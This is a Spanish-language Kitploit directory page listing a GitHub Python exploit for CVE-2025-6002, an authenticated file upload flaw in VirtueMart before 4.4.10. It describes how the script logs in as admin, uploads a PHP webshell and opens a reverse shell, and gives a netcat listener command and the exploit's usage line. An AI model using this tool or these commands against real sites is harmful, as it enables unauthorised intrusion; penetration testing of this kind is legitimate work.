Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-6002 — Exploit en Python para CVE-2025-6002 dirigido a la carga arbitraria de archivos autenticada en VirtueMart < 4.4.10. Inicia sesión, carga una webshell PHP y activa una shell inversa para pruebas de penetración. | Kitploit
Herramientas/GitHubGitHub/schn1tzelme1ster/cve-2025-6002
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónShellcodeExplotación de Aplicaciones WebPruebas de Penetración
GitHubschn1tzelme1ster/cve-2025-6002

CVE-2025-6002

Exploit en Python para CVE-2025-6002 dirigido a la carga arbitraria de archivos autenticada en VirtueMart < 4.4.10. Inicia sesión, carga una webshell PHP y activa una shell inversa para pruebas de penetración.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
9hace 6 mesesAún no revisado
Compartir

Exploit para CVE-2025-6002

Este script explota la vulnerabilidad autenticada de carga arbitraria de archivos en VirtueMart < 4.4.10 (CVE-2025-6002), que se describe en esta publicación del blog: https://blog.blacklanternsecurity.com/p/doomla-zero-days

Este script inicia sesión en VirtueMart con las credenciales proporcionadas, crea un nuevo producto y sube un webshell PHP como archivo multimedia. Luego invoca una reverse shell a la IP/puerto proporcionados.

Parámetros:

  • --url: La url de VirtueMart
  • --username: nombre de usuario del administrador
  • --password: contraseña del administrador
  • --remote-ip: dirección IP del atacantehttps://github.com/schn1tzelme1ster/CVE-2025-6002/tree/main
  • --remote-port: puerto del atacante

Uso:

  1. Ejecuta Netcat en la máquina del atacante:
nc -nlvp 1337
  1. Ejecuta el exploit
python3 exploit.py --url http://x.x.x.x --username admin --password kartoffel --remote-ip x.x.x.x --remote-port 1337
Descargar herramienta